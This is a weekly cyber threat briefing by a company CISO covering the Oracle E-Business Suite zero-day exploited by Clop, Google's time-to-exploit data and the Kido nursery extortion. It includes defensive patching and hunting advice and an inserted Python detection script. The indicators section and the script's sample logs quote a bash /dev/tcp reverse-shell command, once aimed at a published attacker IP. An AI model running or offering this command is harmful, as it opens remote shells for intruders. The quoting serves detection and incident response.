Weekly Cyber Briefing 06.10.2025

Cyber Intelligence Briefing: 06 October 2025

Oracle’s emergency patch for Clop extortion bug; ‘Time to Exploit’ data shows attackers moving faster than ever; Hackers with ethics…sort of

The Cyber Threat Intelligence Briefing is a weekly round-up of the latest cybersecurity news, trends and indicators, curated by our CISO, Nick Harris.


Oracle’s emergency patch for Clop extortion bug

CVE-2025-61882 is a critical remote code execution bug (CVSS 9.8) in the Oracle E-Business Suite’s Concurrent Processing / BI Publisher integration. It can be triggered without authentication over HTTP and is being actively exploited. Oracle issued an emergency patch on 4 October 2025, which requires the October 2023 CPU to be applied.

The vulnerability has been linked to the Clop data-theft/extortion group — a public proof-of-concept and exploit archive leaked online, and Oracle’s indicators of compromise match that leak.

Exploitation has been confirmed in the wild. Mandiant reports that the Clop group exploited multiple Oracle E-Business Suite vulnerabilities — including issues addressed in the July 2025 CPU and this zero-day — to steal large volumes of data in August 2025. No specific victims have been publicly named, though several organisations have reported extortion attempts, and investigations are ongoing.

The indicators of compromise are:

  • IPs: 200.107.207.26, 185.181.60.11
  • Command: sh -c /bin/bash -i >& /dev/tcp/<IP>/<PORT> 0>&1 (reverse shell)
  • Files/hashes: exploit archive and Python scripts listed by Oracle (SHA-256s).
    The full IOC table is in the advisory.

Assured’s CISO reacts:

Advice for Oracle engineers and security practitioners:

1) Patch & prerequisites (change window ASAP)

  1. Verify release & CPU level on every EBS env (PROD, DR, non-prod).
  2. Apply the Oct 2023 Critical Patch Update if it is not already present (Oracle states it’s required). (Oracle)
  3. Apply the Security Alert patch for CVE-2025-61882 for 12.2.3–12.2.14 from My Oracle Support (MOS). (Oracle)
  4. If you deferred July 2025 CPU items affecting EBS, apply those as well, as Clop chained multiple vulnerabilities from July and this zero-day.

2) Exposure reduction (immediately)

  • Ensure the EBS app tier isn’t internet-reachable except through your reverse proxy/WAF; block direct HTTP to Concurrent Processing / BI Publisher endpoints. (The attack vector is unauthenticated HTTP.) (Oracle)
  • Restrict outbound egress from EBS servers; block unknown TCP reverse shells and alert on atypical outbound connections. (Matches observed reverse-shell behaviour.) (Oracle)
  • WAF/IDS rules: temporarily block requests containing suspicious BIP execution/bursting patterns and inspect unusual HTTP POSTs to EBS. (Exploit uses HTTP GET/POST per Oracle.) (Oracle)

3) Hunt & triage

Search across all EBS hosts and reverse proxies for the last 60–90 days:

  • Network: any hits to/from 200.107.207.26 or 185.181.60.11; unexpected outbound connections from app servers. (Oracle)
  • Process audit: shells or Python invoked by the EBS app user; look for the reverse-shell command pattern Oracle shared. (Oracle)
  • Filesystem: artefacts or filenames related to the leaked exploit archive (hashes in the advisory). (Oracle)
  • App logs: unusual BI Publisher job submissions, concurrent requests executing OS commands, spikes in HTTP 500/200 on relevant endpoints around the timeframe Aug–Oct 2025 (Clop activity window). (BleepingComputer)
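An added example, not from the briefing or from Oracle’s advisory, that runs the network and process-audit hunts above over constructed sample log lines: it flags the reverse-shell command pattern and any connection touching the two published IPs. The log line format, the hostname and the `applmgr` OS user are assumptions.

```python
import re

# Indicator IPs published in Oracle's advisory for CVE-2025-61882 (quoted in the briefing).
IOC_IPS = {"200.107.207.26", "185.181.60.11"}

# Reverse-shell pattern from the advisory: sh -c /bin/bash -i >& /dev/tcp/<IP>/<PORT> 0>&1
# Matched loosely so quoting/whitespace variations in audit records still hit.
REVERSE_SHELL_RE = re.compile(
    r"/bin/(?:ba)?sh\s+-i\s*>&\s*/dev/tcp/(?P<ip>[\d.]+)/(?P<port>\d+)"
)

# Constructed sample records (not real logs). Format, hostname and the
# 'applmgr' EBS OS user are assumptions for this example.
SAMPLE_PROCESS_LOG = """\
2025-09-12T02:14:07Z host=ebsapp01 user=applmgr exe=/usr/bin/sh cmd='sh -c /bin/bash -i >& /dev/tcp/185.181.60.11/4444 0>&1'
2025-09-12T02:15:30Z host=ebsapp01 user=applmgr exe=/usr/bin/python3 cmd='python3 /tmp/exp.py'
2025-09-12T03:00:00Z host=ebsapp01 user=applmgr exe=/u01/app/fnd/bin/FNDLIBR cmd='FNDLIBR FND CPMGR'
"""

SAMPLE_CONN_LOG = """\
2025-09-12T02:14:08Z host=ebsapp01 proto=tcp src=10.20.30.40:51234 dst=185.181.60.11:4444 action=allow
2025-09-12T02:20:00Z host=ebsapp01 proto=tcp src=10.20.30.40:51300 dst=10.20.30.5:1521 action=allow
2025-09-12T02:21:00Z host=ebsapp01 proto=tcp src=200.107.207.26:55000 dst=10.20.30.40:8000 action=allow
"""

CONN_RE = re.compile(r"src=(?P<src>[\d.]+):\d+\s+dst=(?P<dst>[\d.]+):\d+")


def find_reverse_shells(process_log):
    """One finding per process record matching the reverse-shell pattern."""
    findings = []
    for line in process_log.splitlines():
        m = REVERSE_SHELL_RE.search(line)
        if m:
            findings.append({"line": line, "ip": m["ip"], "port": int(m["port"]),
                             "known_ioc": m["ip"] in IOC_IPS})
    return findings


def find_ioc_connections(conn_log):
    """Connection records where either endpoint is a published IOC IP."""
    hits = []
    for line in conn_log.splitlines():
        m = CONN_RE.search(line)
        if m and (matched := IOC_IPS & {m["src"], m["dst"]}):
            hits.append({"line": line, "ioc": sorted(matched)[0]})
    return hits
```

Point both functions at your real auditd/EDR process exports and firewall or proxy connection logs for the Aug–Oct 2025 window; a reverse-shell hit to an IP outside the published list still warrants triage.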

4) If you find indicators / suspicious activity…

  • Isolate the app tier, capture volatile data, and rotate all credentials (EBS app, DB, OS, integration accounts, SSO secrets).
  • Review data exfiltration risk: check reverse proxy logs, database audit, and BI Publisher output/bursting destinations for large exports.
  • Engage IR (internal playbook + vendor) and consider notifying Oracle Support with IOC findings for tailored guidance.
  • Legal/comms: prepare for potential extortion emails sent from spoofed or compromised accounts; Mandiant/Google observed mass extortion mailouts tied to this campaign. (BleepingComputer)

5) Hardening (post-patch)

  • Stop/disable unused BI Publisher integrations on EBS where possible, and ensure least-privilege access for the Concurrent Processing accounts.
  • Segmentation: EBS in its own VLAN with deny-by-default egress; only allow required outbound (SMTP relay, SSO, etc.).
  • Monitoring: permanent alerts for reverse shells, unexpected Python/bash under the EBS user, and large report exports.

‘Time to Exploit’ data shows attackers moving faster than ever

Google’s Threat Intelligence Group analysed 112 vulnerabilities disclosed in 2024 that were confirmed to be exploited in the wild. Historically, most exploits target vulnerabilities after a patch is released, rather than before — a roughly 31:69 split between zero-day (before patch) and n-day (after patch) attacks.

The time to exploit (TTE) measures the time it takes for attackers to begin exploiting a vulnerability once a patch is available. The Google data shows that the window has been shrinking rapidly:

  • 2018–2019: 63 days
  • 2020–2021: 44 days
  • 2021–2022: 32 days
  • 2023: 5 days
  • 2024: –1 day (meaning exploits are now appearing before patches are released)

Assured’s CISO reacts:

The trend revealed by this Google data indicates that attackers are moving faster than ever, often striking before defenders have a chance to patch. It highlights the importance of strong incident response planning and cyber insurance to help organisations recover from attacks that can’t be prevented through patching alone.

While we can’t control the uncontrollables, we can control timely patching. Automate patch deployment (with patch rings, canary devices, etc.) so that patches are rolled out as soon as they are available. It’s also important to plan for the possibility of no patch. Good incident response plans should make provisions for exploits that cannot be patched.


Hackers with ethics…sort of

Hackers, known as Radiant, who tried to extort nursery chain Kido Schools by posting stolen images and data of children online, have removed the posts and claimed to have deleted the information. The group had published child profiles and threatened to release more until a Bitcoin ransom was paid, even contacting parents directly. Following widespread outrage, the attackers blurred the images, then took all data offline and issued an apology.

It’s believed that Kido did not pay the ransom, which was thought to be over half a million pounds.

Assured’s CISO reacts:

This incident reminds us of the LockBit ransomware attack on a children’s hospital in Toronto, Canada (SickKids Hospital), in December 2022. In that incident, the LockBit operators issued a public apology on their leak site, claiming that one of their affiliates had violated group policy by targeting a healthcare organisation. They offered a free decryptor key to the hospital and said the responsible affiliate had been “blocked.”

These examples serve as a reminder of the importance of using PR to go on the offensive and turn public opinion against the threat groups. External communication strategy should therefore be considered as part of crisis planning.
